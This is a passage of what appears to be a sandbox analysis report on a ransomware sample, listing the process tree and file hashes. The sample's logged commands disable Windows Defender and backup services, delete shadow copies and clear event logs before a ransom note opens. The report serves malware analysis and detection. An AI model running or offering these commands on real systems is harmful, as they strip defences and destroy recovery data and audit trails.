PID:952 -
C:\Windows\SysWOW64\net.exenet.exe stop "NetMsmqActivator" /y2⤵
- Suspicious use of WriteProcessMemory
PID:584 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator" /y3⤵PID:460
-
C:\Windows\SysWOW64\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:696 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:560
-
C:\Windows\SysWOW64\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1480 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:1364
-
C:\Windows\SysWOW64\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:520 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:1704
-
C:\Windows\SysWOW64\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:364 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:1212
-
C:\Windows\SysWOW64\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:632 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:1956
-
C:\Windows\SysWOW64\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1972 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:1284
-
C:\Windows\SysWOW64\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1544 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:1592
-
C:\Windows\SysWOW64\sc.exesc.exe config "NetMsmqActivator" start= disabled2⤵PID:1492
-
C:\Windows\SysWOW64\sc.exesc.exe config "SamSs" start= disabled2⤵PID:1632
-
C:\Windows\SysWOW64\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:1708
-
C:\Windows\SysWOW64\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:1712
-
C:\Windows\SysWOW64\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:1780
-
C:\Windows\SysWOW64\sc.exesc.exe config "VSS" start= disabled2⤵PID:1768
-
C:\Windows\SysWOW64\sc.exesc.exe config "wbengine" start= disabled2⤵PID:1612
-
C:\Windows\SysWOW64\sc.exesc.exe config "WebClient" start= disabled2⤵PID:872
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:608
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:1368
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:636
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:1840
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:1552
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1956
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:1504
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:2004
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1628
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:1652
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:1496
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:1760
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:856
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:1172
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:580
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:984
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:1640
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:1084
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:1616
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:1564
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:1200
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:1716
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1584
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:576
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1360
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1072
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1944
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1836
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1752
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1604
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:560
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:1212 -
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1540
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1764 -
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1356 -
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1884 -
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:304 -
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:980 -
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1308 -
C:\Windows\SysWOW64\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:2084
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:2108 -
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:2120
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2140 -
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2200
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2220 -
C:\Windows\SysWOW64\notepad.exenotepad.exe C:\a84r_HOW_TO_DECRYPT.txt2⤵
- Opens file in notepad (likely ransom note)
PID:2616 -
C:\Windows\SysWOW64\cmd.execmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe"2⤵PID:2624
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\a84r_HOW_TO_DECRYPT.txt1⤵
- Opens file in notepad (likely ransom note)
PID:2536
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD57ecfb94b8b77105698aa7fff99aac358
SHA16d598804804ec9ec2dc1bb70159a22de4dd9e942
SHA256d57ec17500aea8a048efd62c919c4d150f74e44ed778f7be7985bea2696665b5
SHA5123f8adab343f1997fb12b6df9ac7ff19b9ab100c74f25785c4e70739e52454bbc7dd726184671729fffd993aa2b96fc0f6954d27a4c3d987ac7e3a4c7c503e1d5
-
MD5
5f00eabb52cff99b488fd8202cb2ad3a
SHA1cd7d4f0d9fff26b1611cb2ef2f9c82068f5e9578
SHA256282c1b1267b62b839a830fa1e36cea4a79d65ed73d696050f3478fe514d44ba2
SHA512d0c9bc686b17a8faa66cd08ca4c80deac20ca93e5b89b9750ed6a4da2cd426ca5901ef44ba6930cb19e386f30c56fc11a6a6bfd9f40e88fa77d0c1fe8e2355ee